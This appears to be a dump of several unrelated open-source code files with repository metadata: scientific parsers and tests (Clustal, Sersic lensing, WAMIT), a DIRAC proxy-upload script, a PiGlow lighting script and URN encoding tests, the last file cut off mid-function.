# annoying hack to set a missing_value attribute as well as a _FillValue attribute
dict.__setitem__(ocube.attributes, 'missing_value', fillval)
# now write-out to netCDF
saver = iris.fileformats.netcdf.Saver(filename=outpath, netcdf_format='NETCDF3_CLASSIC')
saver.update_global_attributes(Conventions=iris.fileformats.netcdf.CF_CONVENTIONS_VERSION)
saver.write(ocube, local_keys=['vertical_scaling', 'missing_value','um_stash_source','tracer_name'])
# end of script
|
acsis-project/emissions
|
emissions/python/CMIP6_hybrid/CMIP6_hybrid_regrid_iC5H12_emissions_n96e_360d.py
|
Python
|
gpl-3.0
| 17,171
|
[
"NetCDF"
] |
8ce5924394ea3f6b76cc485af46446bafcef7c9d3df8a8c0be292ac17b0b8f70
|
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from skbio.parse.sequences.clustal import (_is_clustal_seq_line, last_space,
_delete_trailing_number,
parse_clustal)
from skbio.core.exception import RecordError
from unittest import TestCase, main
class ClustalTests(TestCase):
"""Tests of top-level functions."""
def test_is_clustal_seq_line(self):
"""_is_clustal_seq_line should reject blanks and 'CLUSTAL'"""
ic = _is_clustal_seq_line
assert ic('abc')
assert ic('abc def')
assert not ic('CLUSTAL')
assert not ic('CLUSTAL W fsdhicjkjsdk')
assert not ic(' * *')
assert not ic(' abc def')
assert not ic('MUSCLE (3.41) multiple sequence alignment')
def test_last_space(self):
"""last_space should split on last whitespace"""
self.assertEqual(last_space('a\t\t\t b c'), ['a b', 'c'])
self.assertEqual(last_space('xyz'), ['xyz'])
self.assertEqual(last_space(' a b'), ['a', 'b'])
def test_delete_trailing_number(self):
"""Should delete the trailing number if present"""
dtn = _delete_trailing_number
self.assertEqual(dtn('abc'), 'abc')
self.assertEqual(dtn('a b c'), 'a b c')
self.assertEqual(dtn('a \t b \t c'), 'a \t b \t c')
self.assertEqual(dtn('a b 3'), 'a b')
self.assertEqual(dtn('a b c \t 345'), 'a b c')
class ClustalParserTests(TestCase):
"""Tests of the parse_clustal function"""
def test_null(self):
"""Should return empty dict and list on null input"""
result = parse_clustal([])
self.assertEqual(dict(result), {})
def test_minimal(self):
"""Should handle single-line input correctly"""
result = parse_clustal([MINIMAL]) # expects seq of lines
self.assertEqual(dict(result), {'abc': 'ucag'})
def test_two(self):
"""Should handle two-sequence input correctly"""
result = parse_clustal(TWO)
self.assertEqual(dict(result), {'abc': 'uuuaaa', 'def': 'cccggg'})
def test_real(self):
"""Should handle real Clustal output"""
data = parse_clustal(REAL)
self.assertEqual(dict(data), {
'abc':
'GCAUGCAUGCAUGAUCGUACGUCAGCAUGCUAGACUGCAUACGUACGUACGCAUGCAUCA'
'GUCGAUACGUACGUCAGUCAGUACGUCAGCAUGCAUACGUACGUCGUACGUACGU-CGAC'
'UGACUAGUCAGCUAGCAUCGAUCAGU',
'def':
'------------------------------------------------------------'
'-----------------------------------------CGCGAUGCAUGCAU-CGAU'
'CGAUCAGUCAGUCGAU----------',
'xyz':
'------------------------------------------------------------'
'-------------------------------------CAUGCAUCGUACGUACGCAUGAC'
'UGCUGCAUCA----------------'
})
def test_bad(self):
"""Should reject bad data if strict"""
result = parse_clustal(BAD, strict=False)
self.assertEqual(dict(result), {})
# should fail unless we turned strict processing off
with self.assertRaises(RecordError):
_ = dict(parse_clustal(BAD))
def test_space_labels(self):
"""Should tolerate spaces in labels"""
result = parse_clustal(SPACE_LABELS)
self.assertEqual(dict(result), {'abc': 'uca', 'def ggg': 'ccc'})
MINIMAL = 'abc\tucag'
TWO = 'abc\tuuu\ndef\tccc\n\n ***\n\ndef ggg\nabc\taaa\n'.split('\n')
REAL = """CLUSTAL W (1.82) multiple sequence alignment
abc GCAUGCAUGCAUGAUCGUACGUCAGCAUGCUAGACUGCAUACGUACGUACGCAUGCAUCA 60
def ------------------------------------------------------------
xyz ------------------------------------------------------------
abc GUCGAUACGUACGUCAGUCAGUACGUCAGCAUGCAUACGUACGUCGUACGUACGU-CGAC 11
def -----------------------------------------CGCGAUGCAUGCAU-CGAU 18
xyz -------------------------------------CAUGCAUCGUACGUACGCAUGAC 23
* * * * * **
abc UGACUAGUCAGCUAGCAUCGAUCAGU 145
def CGAUCAGUCAGUCGAU---------- 34
xyz UGCUGCAUCA---------------- 33
* ***""".split('\n')
BAD = ['dshfjsdfhdfsj', 'hfsdjksdfhjsdf']
SPACE_LABELS = ['abc uca', 'def ggg ccc']
if __name__ == '__main__':
main()
|
Jorge-C/bipy
|
skbio/parse/sequences/tests/test_clustal.py
|
Python
|
bsd-3-clause
| 4,820
|
[
"scikit-bio"
] |
5f60e2a377746191144a425d7fe2f07eec7d5b69e8ef353def9b06c4da15cab1
|
__author__ = 'sibirrer'
import astrofunc.LensingProfiles.calc_util as calc_util
from astrofunc.LensingProfiles.sersic import Sersic
from astrofunc.LightProfiles.sersic import Sersic as Sersic_light
import numpy as np
import pytest
import numpy.testing as npt
class TestSersic(object):
"""
tests the Gaussian methods
"""
def setup(self):
self.sersic = Sersic()
self.sersic_light = Sersic_light()
def test_function(self):
x = 1
y = 2
n_sersic = 2.
r_eff = 1.
k_eff = 0.2
values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
npt.assert_almost_equal(values, 1.0272982586319199, decimal=10)
x = np.array([0])
y = np.array([0])
values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
npt.assert_almost_equal(values[0], 0., decimal=10)
x = np.array([2,3,4])
y = np.array([1,1,1])
values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
npt.assert_almost_equal(values[0], 1.0272982586319199, decimal=10)
npt.assert_almost_equal(values[1], 1.3318743892966658, decimal=10)
npt.assert_almost_equal(values[2], 1.584299393114988, decimal=10)
def test_derivatives(self):
x = np.array([1])
y = np.array([2])
n_sersic = 2.
r_eff = 1.
k_eff = 0.2
f_x, f_y = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
assert f_x[0] == 0.16556078301997193
assert f_y[0] == 0.33112156603994386
x = np.array([0])
y = np.array([0])
f_x, f_y = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
assert f_x[0] == 0
assert f_y[0] == 0
x = np.array([1,3,4])
y = np.array([2,1,1])
values = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
assert values[0][0] == 0.16556078301997193
assert values[1][0] == 0.33112156603994386
assert values[0][1] == 0.2772992378623737
assert values[1][1] == 0.092433079287457892
def test_differentails(self):
x_, y_ = 1., 1
n_sersic = 2.
r_eff = 1.
k_eff = 0.2
r = np.sqrt(x_**2 + y_**2)
d_alpha_dr = self.sersic.d_alpha_dr(x_, y_, n_sersic, r_eff, k_eff)
alpha = self.sersic.alpha_abs(x_, y_, n_sersic, r_eff, k_eff)
f_xx_ = d_alpha_dr * calc_util.d_r_dx(x_, y_) * x_/r + alpha * calc_util.d_x_diffr_dx(x_, y_)
f_yy_ = d_alpha_dr * calc_util.d_r_dy(x_, y_) * y_/r + alpha * calc_util.d_y_diffr_dy(x_, y_)
f_xy_ = d_alpha_dr * calc_util.d_r_dy(x_, y_) * x_/r + alpha * calc_util.d_x_diffr_dy(x_, y_)
f_xx = (d_alpha_dr/r - alpha/r**2) * y_**2/r + alpha/r
f_yy = (d_alpha_dr/r - alpha/r**2) * x_**2/r + alpha/r
f_xy = (d_alpha_dr/r - alpha/r**2) * x_*y_/r
npt.assert_almost_equal(f_xx, f_xx_, decimal=10)
npt.assert_almost_equal(f_yy, f_yy_, decimal=10)
npt.assert_almost_equal(f_xy, f_xy_, decimal=10)
def test_hessian(self):
x = np.array([1])
y = np.array([2])
n_sersic = 2.
r_eff = 1.
k_eff = 0.2
f_xx, f_yy,f_xy = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
assert f_xx[0] == 0.1123170666045793
npt.assert_almost_equal(f_yy[0], -0.047414082641598576, decimal=10)
npt.assert_almost_equal(f_xy[0], -0.10648743283078525 , decimal=10)
x = np.array([1,3,4])
y = np.array([2,1,1])
values = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
assert values[0][0] == 0.1123170666045793
npt.assert_almost_equal(values[1][0], -0.047414082641598576, decimal=10)
npt.assert_almost_equal(values[2][0], -0.10648743283078525 , decimal=10)
npt.assert_almost_equal(values[0][1], -0.053273787681591328, decimal=10)
npt.assert_almost_equal(values[1][1], 0.076243427402007985, decimal=10)
npt.assert_almost_equal(values[2][1], -0.048568955656349749, decimal=10)
def test_alpha_abs(self):
x = 1.
dr = 0.0000001
n_sersic = 2.5
r_eff = .5
k_eff = 0.2
alpha_abs = self.sersic.alpha_abs(x, 0, n_sersic, r_eff, k_eff)
f_dr = self.sersic.function(x + dr, 0, n_sersic, r_eff, k_eff)
f_ = self.sersic.function(x, 0, n_sersic, r_eff, k_eff)
alpha_abs_num = -(f_dr - f_)/dr
npt.assert_almost_equal(alpha_abs_num, alpha_abs, decimal=3)
def test_dalpha_dr(self):
x = 1.
dr = 0.0000001
n_sersic = 1.
r_eff = .5
k_eff = 0.2
d_alpha_dr = self.sersic.d_alpha_dr(x, 0, n_sersic, r_eff, k_eff)
alpha_dr = self.sersic.alpha_abs(x + dr, 0, n_sersic, r_eff, k_eff)
alpha = self.sersic.alpha_abs(x, 0, n_sersic, r_eff, k_eff)
d_alpha_dr_num = (alpha_dr - alpha)/dr
npt.assert_almost_equal(d_alpha_dr, d_alpha_dr_num, decimal=3)
def test_mag_sym(self):
"""
:return:
"""
r = 2.
angle1 = 0.
angle2 = 1.5
x1 = r * np.cos(angle1)
y1 = r * np.sin(angle1)
x2 = r * np.cos(angle2)
y2 = r * np.sin(angle2)
n_sersic = 4.5
r_eff = 2.5
k_eff = 0.8
f_xx1, f_yy1, f_xy1 = self.sersic.hessian(x1, y1, n_sersic, r_eff, k_eff)
f_xx2, f_yy2, f_xy2 = self.sersic.hessian(x2, y2, n_sersic, r_eff, k_eff)
kappa_1 = (f_xx1 + f_yy1) / 2
kappa_2 = (f_xx2 + f_yy2) / 2
npt.assert_almost_equal(kappa_1, kappa_2, decimal=10)
A_1 = (1 - f_xx1) * (1 - f_yy1) - f_xy1**2
A_2 = (1 - f_xx2) * (1 - f_yy2) - f_xy2 ** 2
npt.assert_almost_equal(A_1, A_2, decimal=10)
def test_convergernce(self):
"""
test the convergence and compares it with the original Sersic profile
:return:
"""
x = np.array([0, 0, 0, 0, 0])
y = np.array([0.5, 1, 1.5, 2, 2.5])
n_sersic = 4.5
r_eff = 2.5
k_eff = 0.2
f_xx, f_yy, f_xy = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
kappa = (f_xx + f_yy) / 2.
assert kappa[0] > 0
flux = self.sersic_light.function(x, y, I0_sersic=1., R_sersic=r_eff, n_sersic=n_sersic)
flux /= flux[0]
kappa /= kappa[0]
npt.assert_almost_equal(flux[1], kappa[1], decimal=5)
if __name__ == '__main__':
pytest.main()
|
sibirrer/astrofunc
|
test/test_sersic_lens.py
|
Python
|
mit
| 6,386
|
[
"Gaussian"
] |
d931365ca5874278dda9b77192dd72afc240745821bcbbc4c887c64f5d865931
|
#!/usr/bin/env python
########################################################################
# $HeadURL$
# File : dirac-proxy-init.py
# Author : Adrian Casajus
########################################################################
from __future__ import print_function
__RCSID__ = "$Id$"
import sys
import DIRAC
from DIRAC.Core.Base import Script
class Params:
proxyLoc = False
dnAsUsername = False
def setProxyLocation(self, arg):
self.proxyLoc = arg
return DIRAC.S_OK()
def setDNAsUsername(self, arg):
self.dnAsUsername = True
return DIRAC.S_OK()
def showVersion(self, arg):
print("Version:")
print(" ", __RCSID__)
sys.exit(0)
return DIRAC.S_OK()
params = Params()
Script.registerSwitch("f:", "file=", "File to use as proxy", params.setProxyLocation)
Script.registerSwitch("D", "DN", "Use DN as myproxy username", params.setDNAsUsername)
Script.registerSwitch("i", "version", "Print version", params.showVersion)
Script.addDefaultOptionValue("LogLevel", "always")
Script.parseCommandLine()
from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager
from DIRAC.Core.Security.MyProxy import MyProxy
from DIRAC.Core.Security.X509Chain import X509Chain # pylint: disable=import-error
from DIRAC.Core.Security import Locations, CS
if not params.proxyLoc:
params.proxyLoc = Locations.getProxyLocation()
if not params.proxyLoc:
print("Can't find any valid proxy")
sys.exit(1)
print("Uploading proxy file %s" % params.proxyLoc)
mp = MyProxy()
retVal = mp.uploadProxy(params.proxyLoc, params.dnAsUsername)
if not retVal['OK']:
print("Can't upload proxy:")
print(" ", retVal['Message'])
sys.exit(1)
print("Proxy uploaded")
sys.exit(0)
|
petricm/DIRAC
|
FrameworkSystem/scripts/dirac-myproxy-upload.py
|
Python
|
gpl-3.0
| 1,720
|
[
"DIRAC"
] |
08a5cd3d8e75a04f39336ac1d5f51a355b3bde0f7e70dceb4894c75e8ac1e894
|
#!/usr/bin/python
######################################
## Sun Emulator using PiGlow ##
## ##
## Example by @Tommybobbins ##
######################################
# Light curves are based on statistical
# normal distributions. Requires python-scipy.
# Uses the Sunrise/Sunset times from astral
# python package.
#
# sudo apt-get install python-scipy
# sudo pip install astral
# Uses the piglow.py Python module from Jason Barnett @Boeeerb
# sudo mkdir /home/pi/LOGGING
# To run automatically:
# Add the following above the exit 0 in the /etc/rc.local
# /usr/bin/python /home/pi/DayNightGlow/sunny.py &
from astral import *
from piglow import PiGlow
import time
import datetime
import logging
dt = datetime.datetime.now()
logging.basicConfig(filename='/home/pi/LOGGING/lightoutput_%i_%i_%i.log' %(dt.year, dt.month, dt.day),level=logging.INFO)
from scipy import stats
number_seconds_day=60*60*24
centre = 0.0
total_intensity=0
max_brightness=255
intensity={}
piglow = PiGlow()
piglow.all(0)
a = Astral()
location = a["Manchester"]
#print (" %s %s %s %s %s \n" % (dawn, sunrise, noon, sunset, dusk))
#Information for Manchester
# 2014-01-21 07:30:11+00:00 2014-01-21 08:10:06+00:00 2014-01-21 12:20:18+00:00 2014-01-21 16:30:35+00:00 2014-01-21 17:10:31+00:00
# For the local timezone
#print ("Time: %s" % t)
logging.info("Epoch_Time\tRed\tOrange\tYellow\tGreen\tBlue\tWhite\tTotal")
def calculate_intensity(x,centre,mu,max_brightness):
#Normal distribution
gaussian = stats.norm(loc=centre, scale=mu)
#Calculate the intensity at max
max_value = gaussian.pdf(centre)
#Multiply by the max_brightness (0-255)
normalisation_value = max_brightness / max_value
y = normalisation_value * gaussian.pdf(x)
# print (x,y)
return(y)
while True:
sun = location.sun(local=True)
dusk=sun['dusk']
noon=sun['noon']
midnight=sun['noon']
sunrise=sun['sunrise']
sunset=sun['sunset']
dawn=sun['dawn']
midnight=sun['noon']+datetime.timedelta(hours=12)
lastmidnight=sun['noon']-datetime.timedelta(hours=12)
# print t.day,t.month,t.year
dt = datetime.datetime.now()
#Convert all the timings into Epoch times
epoch_now = time.mktime(dt.timetuple())
epoch_dawn = time.mktime(dawn.timetuple())
epoch_sunrise= time.mktime(sunrise.timetuple())
epoch_midnight= time.mktime(midnight.timetuple())
epoch_lastmidnight= time.mktime(lastmidnight.timetuple())
epoch_noon= time.mktime(noon.timetuple())
epoch_sunset= time.mktime(sunset.timetuple())
epoch_dusk= time.mktime(dusk.timetuple())
#Now calculate the difference from the current time
dawn_diff = float(epoch_dawn - epoch_now)
sunrise_diff = float(epoch_sunrise - epoch_now)
noon_diff = float(epoch_noon - epoch_now)
sunset_diff = float(epoch_sunset - epoch_now)
dusk_diff = float(epoch_dusk - epoch_now)
midnight_diff = float(epoch_midnight - epoch_now)
lastmidnight_diff = float(epoch_lastmidnight - epoch_now)
#Now convert that the a percentage of the day away we are
norm_dawn_diff = dawn_diff / number_seconds_day
norm_sunrise_diff = sunrise_diff / number_seconds_day
norm_noon_diff = noon_diff / number_seconds_day
norm_sunset_diff = sunset_diff / number_seconds_day
norm_dusk_diff = dusk_diff / number_seconds_day
if (epoch_now > epoch_noon):
norm_midnight_diff = midnight_diff / number_seconds_day
elif (epoch_now < epoch_noon):
norm_midnight_diff = lastmidnight_diff / number_seconds_day
else:
print ("Something wrong")
#Output how many seconds we are away
# print ("D %f, SR %f, N %f, SS %f, D %f M %f\n" % (dawn_diff, sunrise_diff, noon_diff, sunset_diff, dusk_diff, midnight_diff))
#Output what percentage
# print ("D %f, SR %f, N %f, SS %f, D %f , M %f\n" % (norm_dawn_diff, norm_sunrise_diff, norm_noon_diff, norm_sunset_diff, norm_dusk_diff, norm_midnight_diff))
# Calculate Gaussian intensity
# Dawn
#dawn red narrow mu 0.2
#sunrise orange, yellow high mu 0.4
#noon white broad, yellow thinner , green low intensity largest mu 0.6
#midnight = noon + 12 hours blue red low intesity mu 2
#sunset orange, yellow mu 0.4
#dusk red 0.2
#print ("Red")
intensity['red'] = calculate_intensity(norm_dawn_diff,centre,0.04,255)
intensity['red'] += calculate_intensity(norm_dusk_diff,centre,0.04,255)
#print ("Orange")
intensity['orange'] = calculate_intensity(norm_sunrise_diff,centre,0.02,255)
intensity['orange'] += calculate_intensity(norm_sunset_diff,centre,0.02,255)
#print ("Yellow")
intensity['yellow'] = calculate_intensity(norm_sunrise_diff,centre,0.05,255)
intensity['yellow'] += calculate_intensity(norm_sunset_diff,centre,0.05,255)
intensity['yellow'] += calculate_intensity(norm_noon_diff,centre,0.08,255)
#print ("Green")
intensity['green'] = calculate_intensity(norm_noon_diff,centre,0.1,255)
#print ("Blue")
intensity['blue'] = calculate_intensity(norm_midnight_diff,centre,0.15,255)
intensity['blue'] += calculate_intensity(norm_noon_diff,centre,0.09,255)
#print ("White")
intensity['white'] = calculate_intensity(norm_noon_diff,centre,0.07,64)
total_intensity = 0
for key in intensity:
if (intensity[key] > 255):
intensity[key] = 255
else:
intensity[key] = int(round(intensity[key]))
total_intensity += intensity[key]
# print ("Key = %s, value = %i\n" % (key, intensity[key]))
piglow.red(intensity['red'])
piglow.orange(intensity['orange'])
piglow.yellow(intensity['yellow'])
piglow.green(intensity['green'])
piglow.blue(intensity['blue'])
piglow.white(intensity['white'])
# Condensed logging for graphing purposes (time, followed by the colours)
logging.info("%i %i %i %i %i %i %i %i" %(epoch_now,
intensity['red'],
intensity['orange'],
intensity['yellow'],
intensity['green'],
intensity['blue'],
intensity['white'],
total_intensity)
)
time.sleep(60)
|
tommybobbins/DayNightGlow
|
sunny.py
|
Python
|
gpl-2.0
| 6,392
|
[
"Gaussian"
] |
24bab4363ad1b03389193027ad5e1201211535d2fed6fffa9f6a5a81b2838e52
|
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
from unittest import TestCase
from commoncode import urn
class URNTestCase(TestCase):
def test_encode_license(self):
u1 = urn.encode('license', key='somekey')
self.assertEquals('urn:dje:license:somekey', u1)
def test_encode_owner(self):
u1 = urn.encode('owner', name='somekey')
self.assertEquals('urn:dje:owner:somekey', u1)
def test_encode_component(self):
u1 = urn.encode('component', name='name', version='version')
self.assertEquals('urn:dje:component:name:version', u1)
def test_encode_component_no_version(self):
u1 = urn.encode('component', name='name', version='')
self.assertEquals('urn:dje:component:name:', u1)
def test_encode_license_with_extra_fields_are_ignored(self):
u1 = urn.encode('license', key='somekey', junk='somejunk')
self.assertEquals('urn:dje:license:somekey', u1)
def test_encode_missing_field_raise_keyerror(self):
with self.assertRaises(KeyError):
urn.encode('license')
def test_encode_missing_field_component_raise_keyerror(self):
with self.assertRaises(KeyError):
urn.encode('component', name='this')
def test_encode_unknown_object_type_raise_keyerror(self):
with self.assertRaises(KeyError):
urn.encode('some', key='somekey')
def test_encode_component_with_spaces_are_properly_quoted(self):
u1 = urn.encode('component', name='name space',
version='version space')
self.assertEquals('urn:dje:component:name+space:version+space', u1)
def test_encode_leading_and_trailing_spaces_are_trimmed_and_ignored(self):
u1 = urn.encode(' component ', name=' name space ',
version=''' version space ''')
self.assertEquals('urn:dje:component:name+space:version+space', u1)
def test_encode_component_with_semicolon_are_properly_quoted(self):
u1 = urn.encode('component', name='name:', version=':version')
self.assertEquals('urn:dje:component:name%3A:%3Aversion', u1)
def test_encode_component_with_plus_are_properly_quoted(self):
u1 = urn.encode('component', name='name+', version='version+')
self.assertEquals('urn:dje:component:name%2B:version%2B', u1)
def test_encode_component_with_percent_are_properly_quoted(self):
u1 = urn.encode('component', name='name%', version='version%')
self.assertEquals('urn:dje:component:name%25:version%25', u1)
def test_encode_object_type_case_is_not_significant(self):
u1 = urn.encode('license', key='key')
u2 = urn.encode('lICENSe', key='key')
self.assertEquals(u1, u2)
def test_decode_component(self):
u = 'urn:dje:component:name:version'
parsed = ('component', {'name': 'name', 'version': 'version'})
self.assertEqual(parsed, urn.decode(u))
def test_decode_license(self):
u = 'urn:dje:license:lic'
parsed = ('license', {'key': 'lic'})
self.assertEqual(parsed, urn.decode(u))
def test_decode_org(self):
u = 'urn:dje:owner:name'
parsed = ('owner', {'name': 'name'})
self.assertEqual(parsed, urn.decode(u))
def test_decode_build_is_idempotent(self):
u1 = urn.encode('component', owner__name='org%', name='name%',
version='version%')
m, f = urn.decode(u1)
u3 = urn.encode(m, **f)
self.assertEqual(u1, u3)
def test_decode_raise_exception_if_incorrect_prefix(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('arn:dje:a:a')
def test_decode_raise_exception_if_incorrect_ns(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:x:x:x')
def test_decode_raise_exception_if_incorrect_prefix_or_ns(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('x:x:x:x')
def test_decode_raise_exception_if_too_short_license(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:license')
def test_decode_raise_exception_if_too_short_component(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:component')
def test_decode_raise_exception_if_too_long(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:owner:o:n')
def test_decode_raise_exception_if_too_long1(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:component:o:n:v:junk')
def test_decode_raise_exception_if_too_long2(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:owner:org:junk')
def test_decode_raise_exception_if_too_long3(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:license:key:junk')
def test_decode_raise_exception_if_unknown_object_type(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje:marshmallows:dsds')
def test_decode_raise_exception_if_missing_object_type(self):
with self.assertRaises(urn.URNValidationError):
urn.decode('urn:dje::dsds')
def test_encode_decode_is_idempotent(self):
object_type = 'component'
fields = {'name': 'SIP Servlets (MSS)', 'version': 'v 1.4.0.FINAL'}
encoded = 'urn:dje:component:SIP+Servlets+%28MSS%29:v+1.4.0.FINAL'
assert encoded == urn.encode(object_type, **fields)
assert object_type, fields == urn.decode(encoded)
|
retrography/scancode-toolkit
|
tests/commoncode/test_urn.py
|
Python
|
apache-2.0
| 7,034
|
[
"VisIt"
] |
8d735f3184def59d851ce5c5c1f3db3ed86322486c507fdd22959016b2bed149
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''bemio WAMIT module
This moduel provides functionality to read and interact with WAMIT simulation
output data
'''
import os
import numpy as np
from bemio.data_structures import bem
class WamitOutput(object):
'''
Class to read and interact with WAMIT simulation data
Parameters:
out_file : str
Name of the wamit .out output file. In order to read scattering
and Froud-Krylof forces the .3sc (scatterin) and .3fk
(Froud-Krylof) coefficinet files must have the same base name
as the .out file.
density : float, optional
Water density used to scale the hydrodynamic coefficient data
gravity : float, optional
Acceleration due to gravity used to scale the hydrodynamic
coefficient dataaaa
scale : bool, optional
Boolean value to determine if the hydrodynamic data is scaled.
See the bemio.data_structures.bem.scale function for more
information
Examples
The user can create a WamitOutput data object directily as show below,
or the bemio.io.wamit.read function can be used. The following example
assumes there is a WAMIT output file named `wamit.out`.
>>> wamit_data = WamitOtuput(out_file=wamit.out)
'''
def __init__(self, out_file, density=1000., gravity=9.81, scale=False):
self.files = bem.generate_file_names(out_file)
self.files['3sc'] = self.files['base_name'] + '.3sc'
self.files['3fk'] = self.files['base_name'] + '.3fk'
self.rho = density
self.g = gravity
self.body = {}
self.scaled_at_read = scale
self.scaled = False
self._read()
def _read(self):
'''Internal function to read WAMIT output file into the class. that is called during __init__
'''
print '\nReading the WAMIT results in the ' + self.files['out'] + ' file'
with open(self.files['out'],'rU') as fid:
raw = fid.readlines()
code = 'WAMIT'
num_bodies = 0 # Total number of bodies
bod_count = 0 # Counter for bodies
T = []
cg = {}
cb = {}
name = {}
disp_vol = {}
k = {}
wave_dir = []
empty_line = '\n'
for i, line in enumerate(raw):
if "POTEN run date and starting time:" in line:
skip = 2
data = raw[i+skip]
count = 0
while data != empty_line:
if float(data.split()[0]) == 0. or float(data.split()[0]) == -1.:
count += 1
data = raw[i+count+skip]
else:
count += 1
T.append(float(data.split()[0]))
data = raw[i+count+skip]
if "Wave Heading (deg)" in line:
wave_dir.append(float(line.split()[-1]))
if 'Water depth:' in line:
water_depth = raw[i].split()[2]
try:
water_depth = np.float(water_depth)
except:
pass
# If there is one body in the WAMIT run
if "Input from Geometric Data File:" in line:
num_bodies = 1
name[0] = raw[i].split()[-1]
# If there are two bodies in the WAMIT run
if "Input from Geometric Data Files:" in line:
for j in xrange(20): # look for bodies within the next 20 lines
if "N=" in raw[i+j]:
num_bodies += 1
name[num_bodies-1] = raw[i+j].split()[-1]
# Read the body positions
# if "Total panels:" in line or "NPATCH:" in line:
if "XBODY" in line:
for j in xrange(12): # look for position within the next 15 lines - will only work for wamit files of about 5 bodies
if 'XBODY =' in raw[i+j]:
'''
Note that this is the XBOD YBOD ZBOD defined in the wamit .out file, not the cg as defined in the wamit file
'''
temp = raw[i+j].split()
cg[bod_count] = np.array([temp[2],temp[5],temp[8]]).astype(float)
if 'Volumes (VOLX,VOLY,VOLZ):' in raw[i+j]:
temp = raw[i+j].split()
disp_vol[bod_count] = float(temp[-1])
if 'Center of Buoyancy (Xb,Yb,Zb):' in raw[i+j]:
temp = raw[i+j].split()
cb[bod_count] = np.array([temp[-3],temp[-2],temp[-1]]).astype(float)
if 'C(3,3),C(3,4),C(3,5):' in raw[i+j]:
temp = np.zeros([6,6])
temp2 = raw[i+j].split()
temp[2,2] = np.float(temp2[1])
temp[2,3] = np.float(temp2[2])
temp[2,4] = np.float(temp2[3])
temp[3,2] = temp[2,3]
temp[4,2] = temp[2,4]
temp2 = raw[i+j+1].split()
temp[3,3] = np.float(temp2[1])
temp[3,4] = np.float(temp2[2])
temp[3,5] = np.float(temp2[3])
temp[4,3] = temp[3,4]
temp[5,3] = temp[3,5]
temp2 = raw[i+j+2].split()
temp[4,4] = np.float(temp2[1])
temp[4,5] = np.float(temp2[2])
temp[5,4] = temp[4,5]
k[bod_count] = temp
bod_count += 1
# Put things into numpy arrays
T = np.array(T).astype(float)
wave_dir = np.array(wave_dir).astype(float)
# Only select the wave headings once
temp = 999999
temp_wave_dir = []
count = 0
while temp != wave_dir[0]:
count += 1
temp_wave_dir.append(wave_dir[count-1])
temp = wave_dir[count]
wave_dir = np.array(temp_wave_dir).astype(float)
# Read added mass and rad damping
count_freq = 0
am_all = np.zeros([6*num_bodies,6*num_bodies,T.size])
rd_all = am_all.copy()
am_inf = np.zeros([6*num_bodies,6*num_bodies])
am_zero = am_inf.copy()
for i, line in enumerate(raw):
# Read inf freq added mass
if "Wave period = zero" in line:
count = 7
temp_line = raw[count+i]
while temp_line != empty_line:
am_inf[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1] = temp_line.split()[2]
count += 1
temp_line = raw[count+i]
# Read zero freq added mass
if "Wave period = infinite" in line:
count = 7
temp_line = raw[count+i]
while temp_line != empty_line:
am_zero[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1] = temp_line.split()[2]
count += 1
temp_line = raw[count+i]
# Read freq dependent added mass and rad damping
if "Wave period (sec) =" in line:
temp = raw[i].split()
T[count_freq]=temp[4]
count = 7
temp_line = raw[count+i]
while temp_line != empty_line:
am_all[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1,count_freq] = temp_line.split()[2]
rd_all[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1,count_freq] = temp_line.split()[3]
count += 1
temp_line = raw[count+i]
count_freq += 1
# Terribly complicated code to read excitation forces and phases, RAOs, etc
ex_all = np.zeros([6*num_bodies,wave_dir.size,T.size])
phase_all = ex_all.copy()
rao_all = ex_all.copy()
rao_phase_all = ex_all.copy()
